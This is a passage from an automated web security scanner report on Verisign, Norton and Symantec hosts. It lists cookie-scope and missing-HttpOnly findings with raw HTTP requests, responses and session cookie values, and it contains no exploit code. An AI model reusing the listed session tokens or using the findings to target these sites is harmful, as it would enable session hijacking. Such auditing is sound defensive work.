The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.48. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/popup_button_right.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.49. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/pricebox_bg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.50. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.51. https://trust-center.verisign.com/rcm/verisign/images/truste.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/truste.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.52. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermArrow.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.53. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermBgM.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.54. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtB.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.55. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtT.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.56. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/tsTermWtT.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=677EAADCDB2A10DB6A7FCEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.57. https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/images/webtrust.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=685CA56CDB2A10DB44B7B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.58. https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/account_signin.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=64AF4CEEDB2A10DB44ABB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.59. https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/chat_support.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=66684BA8DB2A10DB4CF19F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.60. https://trust-center.verisign.com/rcm/verisign/scripts/default.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/default.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=649170C0DB2A10DB4CEA9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.61. https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/oo_conf_en-US_inline.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=659B664CDB2A10DB44AFB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.62. https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/oo_engine_c.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=65897DECDB2A10DB4CEE9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.63. https://trust-center.verisign.com/rcm/verisign/scripts/popup.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/popup.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=667DD996DB2A10DB6A7CCEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.64. https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/product_white_list.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=657CE672DB2A10DB4CED9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.65. https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/quick_signin.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=64A2C5DCDB2A10DB6A76CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.66. https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/script_log.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=64914668DB2A10DB44AAB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.67. https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/src/dojo/dojo/dojo.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=657C9186DB2A10DB6A79CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.68. https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/syscheck.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63C826F2DB2A10DB6A72CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.69. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/tealeaf/TealeafSDK.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=648BEF60DB2A10DB6A75CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.70. https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63C9FBBCDB2A10DB4CE79F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.71. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/trustcenter_capture_payment.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6589B492DB2A10DB4CEF9F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.72. https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/trustcenter_product_selector.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=657C8646DB2A10DB44AEB1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.73. https://trust-center.verisign.com/rcm/verisign/scripts/utility.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/scripts/utility.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=648BC83CDB2A10DB4CE99F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.74. https://trust-center.verisign.com/rcm/verisign/style/brand.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/brand.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63B1D50ADB2A10DB4CE69F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.75. https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/capture_payment.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=6655F87CDB2A10DB4CF09F6CAED9DACC; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.76. https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/minimal_form.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63B3241EDB2A10DB44A6B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.77. https://trust-center.verisign.com/rcm/verisign/style/module.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/module.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63B20958DB2A10DB6A71CEC4D1E75D2A; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.78. https://trust-center.verisign.com/rcm/verisign/style/product_selector.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/product_selector.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=63B2FDB8DB2A10DB44A5B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.79. https://trust-center.verisign.com/rcm/verisign/style/vrsn.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://trust-center.verisign.com
Path:	/rcm/verisign/style/vrsn.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=666769EADB2A10DB44B1B1847A7DDBAF; Path=/; Domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.80. http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.ch
Path:	/assets/shared/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /assets/shared/images/sm_004276_oo.gif HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:47 GMT
Server: Apache
Set-Cookie: v1st=85AC46EBE3E5BE40; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.ch
Last-Modified: Wed, 19 Jan 2011 20:21:22 GMT
ETag: "2e58332-255-49a38c2aff480"
Accept-Ranges: bytes
Content-Length: 597
X-UA-Compatible: IE=EmulateIE7
Content-Type: image/gif

GIF89a    .    .....Bv...!..NETSCAPE2.0.....!..    ....,....    .    ......h.i.X.oU...m.    ..!..    ....,......    ......y........2.M.Z..!..    ....,......    .....b.x...bS..
.!..    ....,......    ...........s.M.
.!..    ....,......    ....
...[SNIP]...

9.81. http://www.verisign.co.uk/hp07/i/vlogo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.verisign.co.uk
Path:	/hp07/i/vlogo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hp07/i/vlogo.gif HTTP/1.1
Host: www.verisign.co.uk
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:05 GMT
Server: Apache
Set-Cookie: v1st=3A369731F9FF1259; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.co.uk
Last-Modified: Mon, 04 Apr 2011 20:53:46 GMT
ETag: "29480d7-13e4-4a01df4a82a80"
Accept-Ranges: bytes
Content-Length: 5092
Content-Type: image/gif

GIF89aZ.)...."""..0.........DDD.........333........%UUU.........#. ..............-...-)*.........fff!..... .....www..(..#"..3/0......&"#.........\YZigh...0,-$ !*&'.............F..*.........PLM......M
...[SNIP]...

9.82. https://www.verisign.com/assets/visual-sciences/vip/zig.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.verisign.com
Path:	/assets/visual-sciences/vip/zig.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

v1st=A410AF29B33CAB52; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

10. Cookie without HttpOnly flag set previous next
There are 118 instances of this issue:

https://admin.instantservice.com/Customer
https://admin.instantservice.com/links/5851/14753
https://admin.instantservice.com/links/5851/16144
https://admin.instantservice.com/links/5851/16145
https://admin.instantservice.com/links/5851/39897
http://buy.norton.com/
http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/
http://buy.norton.com/estore/mf/category/categoryCode/Macintosh_Sub_Category/CategoryURLname/mac/
http://buy.norton.com/estore/mf/category/categoryCode/Other_Sub_Category/CategoryURLname/other/
http://buy.norton.com/estore/mf/category/categoryCode/PC_Security_Sub_Category/CategoryURLname/pc-security/
http://buy.norton.com/estore/mf/landingProductFeatures
http://buy.norton.com/estore/mf/landingPromotion
http://buy.norton.com/estore/mf/productDetails/slotNo/1/sourcePageType/UpgradeRenewal/productShortName/norton-360-premier-edition/productSkuCode/21138694/priceGroupId/1000000000000000102/
http://buy.norton.com/estore/mf/productDetails/slotNo/4/sourcePageType/UpgradeRenewal/productShortName/norton-internet-security/productSkuCode/21171898/priceGroupId/1000000000000001501/
http://buy.norton.com/estore/mf/upgradeCenter
http://buy.norton.com/estore/mf/upgradeRenewal
http://buy.norton.com/estore/productsBundleDetailsMoreInfo/parentCartId/0/slotNo/3/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/72ADB489-65DA-37DC-1C0C-68E27DE2B096/priceGroupId/IRC_Bundle_Upgrade_PL/
http://buy.norton.com/estore/productsDetailsMoreInfo/parentCartId/0/slotNo/2/sourcePageType/UpgradeRenewal/asoociationType/0/productSkuCode/21147701/priceGroupId/IRC_Upgrade_PL/
http://buy.norton.com/upgrades-renewals
https://idprotect.verisign.com/toolbar/activate.v
http://m.verisign.com/
http://mbox3.offermatica.com/m2/verisign/mbox/standard
https://onlinefamily.norton.com/familysafety/loginStart.fs
https://products.verisign.com/geocenter/reseller/doregister.do
https://products.verisign.com/geocenter/reseller/logon.do
https://products.verisign.com/geocenter/reseller/register.do
https://securitycenter.verisign.com/celp/enroll/outsideSearch
https://securitycenter.verisign.com/celp/enroll/retail
https://securitycenter.verisign.com/celp/enroll/upsell
https://trust-center.verisign.com/process/retail/session_timeout
http://us.norton.com/beta/index.jsp
http://us.norton.com/beta/overview.jsp
http://vipmobile.verisign.com/fpa/fpa.jsp
http://vipmobile.verisign.com/images/b_shadow.png
http://vipmobile.verisign.com/images/bl_shadow.png
http://vipmobile.verisign.com/images/br_shadow.png
http://vipmobile.verisign.com/images/dot.gif
http://vipmobile.verisign.com/images/home_rght_box.gif
http://vipmobile.verisign.com/images/r_shadow.png
http://vipmobile.verisign.com/images/rt_shadow.png
http://vipmobile.verisign.com/images/topleft.gif
https://vipmobile.verisign.com/fpa/fpa.jsp
http://buy.norton.com/
http://buy.norton.com/ps
http://buy.norton.com/special-promotions
http://buy.norton.com/support
http://buy.symanteccloud.com/freetrial
http://buy.symanteccloud.com/smbstore
http://com-verisign.netmng.com/
http://com-verisign.netmng.com//
http://free.pctools.com/res/js/utils.php
http://mbox3.offermatica.com/m2/verisign/mbox/standard
https://onlinefamily.norton.com/familysafety/basicpremium.fs
http://renewals.symantec.com/renewals/application
https://renewals.symantec.com/renewals/application
http://sales.liveperson.net/hc/2735064/
http://sales.liveperson.net/hc/2735064/
http://sales.liveperson.net/hc/2735064/
http://sales.liveperson.net/hc/71097838/
http://sales.liveperson.net/hc/71097838/
http://sales.liveperson.net/hc/71097838/
https://ssl-certificate-center.verisign.ch/process/retail/console_login
https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
https://ssl-certificate-center.verisign.com/process/retail/console_login
https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
https://trust-center.verisign.ch/process/retail/console_login
https://trust-center.verisign.ch/process/retail/trust_initial
https://trust-center.verisign.com/favicon.ico
https://trust-center.verisign.com/process/retail/console_login
https://trust-center.verisign.com/process/retail/help_and_support
https://trust-center.verisign.com/process/retail/redirect
https://trust-center.verisign.com/process/retail/trust_initial
https://trust-center.verisign.com/process/retail/trust_product_selector
https://trust-center.verisign.com/process/retail/trust_product_selector.do
https://trust-center.verisign.com/rcm/TeaLeafTarget.html
https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_gray.gif
https://trust-center.verisign.com/rcm/verisign/images/arrow_progressBar_red.gif
https://trust-center.verisign.com/rcm/verisign/images/divider.gif
https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif
https://trust-center.verisign.com/rcm/verisign/images/logo.gif
https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif
https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif
https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif
https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif
https://trust-center.verisign.com/rcm/verisign/images/truste.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif
https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg
https://trust-center.verisign.com/rcm/verisign/images/webtrust.gif
https://trust-center.verisign.com/rcm/verisign/scripts/account_signin.js
https://trust-center.verisign.com/rcm/verisign/scripts/chat_support.js
https://trust-center.verisign.com/rcm/verisign/scripts/default.js
https://trust-center.verisign.com/rcm/verisign/scripts/oo_conf_en-US_inline.js
https://trust-center.verisign.com/rcm/verisign/scripts/oo_engine_c.js
https://trust-center.verisign.com/rcm/verisign/scripts/popup.js
https://trust-center.verisign.com/rcm/verisign/scripts/product_white_list.js
https://trust-center.verisign.com/rcm/verisign/scripts/quick_signin.js
https://trust-center.verisign.com/rcm/verisign/scripts/script_log.js
https://trust-center.verisign.com/rcm/verisign/scripts/src/dojo/dojo/dojo.js
https://trust-center.verisign.com/rcm/verisign/scripts/syscheck.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDK.js
https://trust-center.verisign.com/rcm/verisign/scripts/tealeaf/TealeafSDKConfig.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_capture_payment.js
https://trust-center.verisign.com/rcm/verisign/scripts/trustcenter_product_selector.js
https://trust-center.verisign.com/rcm/verisign/scripts/utility.js
https://trust-center.verisign.com/rcm/verisign/style/brand.css
https://trust-center.verisign.com/rcm/verisign/style/capture_payment.css
https://trust-center.verisign.com/rcm/verisign/style/minimal_form.css
https://trust-center.verisign.com/rcm/verisign/style/module.css
https://trust-center.verisign.com/rcm/verisign/style/product_selector.css
https://trust-center.verisign.com/rcm/verisign/style/vrsn.css
http://www.verisign.ch/assets/shared/images/sm_004276_oo.gif
http://www.verisign.co.uk/hp07/i/vlogo.gif
https://www.verisign.com/assets/visual-sciences/vip/zig.js
https://www4.symantec.com/Vrt/wl

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

10.1. https://admin.instantservice.com/Customer previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/Customer

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=9A45BF0A3BE120A9EF79A1A51006FFFF; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Customer HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.2. https://admin.instantservice.com/links/5851/14753 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/14753

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/14753 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.3. https://admin.instantservice.com/links/5851/16144 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/16144

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16144 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.4. https://admin.instantservice.com/links/5851/16145 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/16145

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16145 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.5. https://admin.instantservice.com/links/5851/39897 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://admin.instantservice.com
Path:	/links/5851/39897

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/39897 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

